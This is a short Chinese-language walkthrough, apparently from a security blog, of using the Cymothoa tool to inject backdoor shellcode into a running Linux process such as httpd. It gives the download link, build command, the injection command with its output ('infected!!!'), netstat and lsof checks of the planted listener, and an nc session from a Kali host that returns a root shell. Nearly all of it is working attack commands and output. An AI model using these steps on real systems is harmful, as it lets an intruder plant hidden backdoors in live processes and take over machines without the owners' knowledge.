下载：https://sourceforge.net/projects/cymothoa/files/
测试环境：
32位环境下可以编译成功
[root@localhost cymothoa-1-alpha]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux
64位环境下编译报错
后门注入到的进程,只要有权限就行,然后反弹的也就是进程相应的权限,当然进程重启或者挂了也就没了

 

[root@localhost cymothoa-1-alpha]# make

cc cymothoa.c -o cymothoa -Dlinux_x86

[root@localhost cymothoa-1-alpha]#./cymothoa -p 3055-s 0-y 4444//3055为要注入进程的进程号

[+] attaching to process 3055

register info:

-----------------------------------------------------------

eax value:0xfffffffc ebx value:0x9c44400

esp value:0xbf9fc434 eip value:0x51c402

------------------------------------------------------------

[+]new esp:0xbf9fc430

[+] injecting code into0x008c1000

[+] copy general purpose registers

[+] detaching from3055

[+] infected!!!

比如注入到httpd进程中，然后nc连接

[root@localhost mafix]# netstat -ano | grep 8888

tcp 000.0.0.0:88880.0.0.0:* LISTEN off (0.00/0/0)

[root@localhost mafix]# lsof -i:8888

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

sh 15575 root 0uIPv455604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696(ESTABLISHED)

sh 15575 root 1uIPv455604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696(ESTABLISHED)

sh 15575 root 2uIPv455604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696(ESTABLISHED)

sh 15575 root 10uIPv455603 TCP *:ddi-tcp-1(LISTEN)

sh 15575 root 11uIPv455604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696(ESTABLISHED)

[root@localhost mafix]# ps axu | grep 15575| grep -v grep

root 155750.00.02556984? S 21:590:00/bin//sh

root@kali-vincent:~# nc -vv 172.16.100.1568888

172.16.100.156: inverse host lookup failed:Unknown host

(UNKNOWN)[172.16.100.156]8888(?) open

whoami

root